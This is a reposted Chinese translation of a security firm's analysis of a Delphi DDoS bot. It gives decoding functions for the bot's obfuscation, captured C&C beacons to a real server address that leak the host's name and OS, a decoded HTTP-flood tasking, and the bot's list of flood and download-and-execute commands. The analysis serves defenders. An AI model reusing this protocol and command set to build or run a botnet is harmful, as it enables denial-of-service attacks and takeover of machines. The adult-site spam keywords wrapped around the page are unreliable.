成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Arbor成功攔截雪豹病毒

安全
@malpush把Tweet中的木馬雪豹暴露到了我們Arbor的無線電探測器中,此次的木馬表現是在Tweet中顯示一個網址,當你填入信息后,他會通往一個指令和控制面板.

@malpush把Tweet中的木馬雪豹暴露到了我們Arbor的無線電探測器中,此次的木馬表現是在Tweet中顯示一個網址,當你填入信息后,他會通往一個指令和控制面板(C&C)如下所示:

Arbor成功攔截雪豹病毒

這一現象使我深信我應更深入地了解雪豹。巧合的是對于Arbor來說,這一惡意程序結果竟是DDos(分布式拒絕服務攻擊)僵尸程序。

惡意程序樣例

分析研究樣例可以在malwr查找到 (MD5: 4fa91b76294d849d01655ffb72b30981)。

這是用Delphi編寫的惡意軟件包括以下幾種形式: UPX填充,字符串模糊處理,反病毒機器,反調試,自我修改代碼,過程挖空。

這種基于Delphi的使用和使用的面板部分的語言,很可能是起源于俄羅斯。

模糊處理

木馬雪豹使用兩種模糊處理方式;它們是 base64 和 XOR的聯合。不同秘鑰使用不同的部分。第一個模糊處理方式是用在字符串上,可以用下面的Python函數可以解碼:

def decrypt_strings(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for i in range(len(msg_no_b64)): key_lsb = ord(key[i % len(key)]) & 0xf msg_lsb = ord(msg_no_b64[i]) & 0xf c = msg_lsb ^ key_lsb d = c ^ 0xa msg_slsb = ord(msg_no_b64[i]) & 0xf0 plain_byte = msg_slsb ^ d plain_buf.append(chr(plain_byte)) return "".join(plain_buf)

下面是一些例子:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH") 'Kernel32.dll' >>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH") 'GetModuleHandleA' >>> decrypt_strings("dWpkbXFqZmxi", "mu#X") 'removeone' >>> decrypt_strings("cn9tY3Nqf2d1", "mu#X") 'updatever' >>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx") 'http://188.190.101.13/hor/input.php'

第二種方法主要用在C&C通信上,并且可按照下面Python函數清理:

def decrypt_cnc(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for offset, enc_byte in enumerate(msg_no_b64): plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)]) plain_buf.append(chr(plain_byte)) return "".join(plain_buf)

下面是一些例子:

>>> decrypt_cnc("ChYJCRhta3k=", "\x38") '2.11 USA' >>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "\x38") '5 x86 A 0d 0h 7m 28s'

指令與控制

C&C是基于HTTP(超文本轉移協議)。兩種信息類型已經被識別出來了。第一種信息類型o或者是“背景連線通訊”就像這樣:

POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://mhome.br Content-Length: 106 Content-Type: application/x-www-form-urlencoded m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=

這就是它如何被解碼的:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

它的POST參數是:

· m – Message type (0)

· h – Hash based on computer name

· p – Computer name

· v – Version and locale

· s – Windows version, architecture, user type, and uptime

背景連線通訊反應如下方:

HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 14:48:27 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 32 Connection: close Content-Type: text/html; charset=UTF-8 dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN

被解碼,這是在請求中使用的用戶代理

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "\x38") 'Mozilla Gecko Firefox 25'

第二種信息類型是1或者“指令調查”。 如下方:

POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://udot.tk Content-Length: 49 Content-Type: application/x-www-form-urlencoded m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

被解碼為:

m=1&h=18803769021711750776216376939

它的POST參數是:

· m – Message type (1)

· h – Hash based on computer name

調查反應樣例:

HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 12:56:16 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 72 Connection: close Content-Type: text/html; charset=UTF-8 UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=

被解碼:

decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "\x38") 'httpflood*http://target.net/index.php/*80*150*0'

指令被多個“*”限定,如下面格式:

command*arg1*arg2*arg3*arg4*arg5*arg6*arg7

指令

下面的bot(網絡爬蟲)指令已被識別:

· httpflood – HTTP GET flood

· httppost – HTTP POST flood

· udpflood – UDP flood

· synflood – TCP connect flood

· tcpflood – TCP flood

· download – download and execute (all bots)

· downloadone – download and execute (specified bot)

· update – update (all bots)

· updateos – update (specified OS)

· updateone – update (specified bot)

· updatever – update (specified version)

· removeos – remove bot (specified OS)

· removeone – remove bot (specified bot)

· s! – stop all floods

· su – stop UDP flood

· sh – stop HTTP flood

· ss – stop TCP SYN flood

· st – stop TCP flood

關于每個指令的更多信息,可在C&C面板內的“任務管理”一欄查找到。

Arbor成功攔截雪豹病毒

Arbor成功攔截雪豹病毒

注意:我在分析的二進制里看不到任何關于“memexec”或者“script”指令的引用。

指令和控制面板

總結起來,這便是指令和控制面板幕后的行程;“靜態/指數”頁面:

Arbor成功攔截雪豹病毒

這便是“上傳”頁面:

Arbor成功攔截雪豹病毒

部分“Bot清單”頁面:

Arbor成功攔截雪豹病毒

結論:

該篇分析了crypto(加密),C&C基礎設施,與木馬指令臺。雪豹——一個新的DDoS bot(網絡爬蟲)程序很可能來自于俄羅斯。在寫入的同時,僅有少量的獨特樣例與C&C服務器已經被識別了,那么這項新威脅之攻擊規模和影響還有待確定。Arbor安全工程響應小組(ASERT)將會繼續追蹤雪豹病毒。

責任編輯:藍雨淚 來源: 51CTO.com
相關推薦

2009-11-19 08:51:15

Windows 7系統抄襲

2009-04-09 11:15:39

2009-09-01 13:03:25

雪豹蘋果操作系統

2011-07-11 13:02:24

病毒瑞星安全

2009-09-09 08:51:16

Windows 7雪豹圖標

2012-08-17 18:24:07

2012-11-03 16:01:18

2012-07-26 14:06:43

2013-09-13 14:03:14

2012-12-10 12:40:01

2013-01-30 10:46:06

BYODARBOR網絡體系

2009-08-27 11:59:09

蘋果雪豹Windows 7

2009-08-31 10:36:51

蘋果操作系統雪豹評測

2009-05-14 09:23:37

微軟Windows 7操作系統

2009-11-12 08:48:29

Windows 7上網本

2009-09-01 12:52:06

雪豹蘋果操作系統

2011-07-21 10:39:26

2012-12-25 19:09:02

2012-09-06 15:13:48

2012-08-17 17:07:48

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 精品久久久久香蕉网 | 99re视频在线 | 欧美日韩三级在线观看 | 亚洲视频中文字幕 | 看片一区 | 欧美日韩中文字幕 | 久久久久久国模大尺度人体 | 免费观看的黄色网址 | 天堂国产| 日日夜夜天天综合 | 久在线精品视频 | 国产精品免费播放 | 国产精品色哟哟网站 | 久久久欧洲 | 精品日韩在线 | eeuss国产一区二区三区四区 | 久久精点视频 | 在线看亚洲| 国产视频中文字幕 | 国产一级视频免费播放 | 国产成人免费一区二区60岁 | 亚洲一区二区电影在线观看 | 午夜免费视频 | 久久av一区二区三区 | 国家一级黄色片 | 欧美性jizz18性欧美 | 成人h动漫精品一区二区器材 | 久久久久久国产精品免费免费 | 一区二区免费在线 | 在线看片网站 | 日本一道本视频 | 欧美成人精品在线观看 | 神马久久香蕉 | 成人小视频在线 | 午夜精品三区 | 欧美一区二区三区在线观看视频 | 久久成人一区二区三区 | 国产一区二区三区在线视频 | 成人久久久 | 精品一区二区三区免费视频 | 亚洲欧美在线免费观看 |